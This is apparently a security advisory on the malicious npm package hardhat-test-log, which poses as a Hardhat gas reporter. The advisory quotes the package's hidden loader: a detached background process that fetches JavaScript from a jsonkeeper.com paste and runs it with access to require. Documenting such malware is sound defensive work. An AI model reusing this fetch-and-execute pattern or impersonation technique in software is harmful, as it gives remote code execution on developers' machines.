hardhat-test-log @1.1.0

Summary

Package impersonates the legitimate hardhat-gas-reporter / eth-gas-reporter (README is a near-verbatim copy referencing eth-gas-reporter, but package.json name is hardhat-test-log). The exported reporter function in index.js sets var opt = 1 and unconditionally takes the else branch, making the plausible Mocha-reporter implementation in the if (!opt) block dead code that exists only as cover. The reachable branch calls utils.connectNet(...) in lib/utils.js, which uses child_process.spawn('node', [lib/syncResolve.js,...], { detached: true, stdio: ['ignore'] }) followed by progs.unref() to launch a detached, output-suppressed background process that survives the parent test runner. lib/syncResolve.js then performs axios.get('https://www.jsonkeeper.com/b/NB36A', { headers: { 'x-secret-key': '_' } }) , reads data.Cookie from the response, and executes it via new Function.constructor('require', result)(require) — full remote code execution in the developer's Node process with access to require . jsonkeeper.com is an anonymous free JSON paste host whose content the author can mutate at any time, so any developer who installs this package and runs their Hardhat/Mocha test suite using this reporter will execute whatever JavaScript the author chooses to host there.

Source: amazon-inspector (c8eaf29821b0a2792ecc08837bdd52a09bee062279d6c8c83f5f15855b1098f6)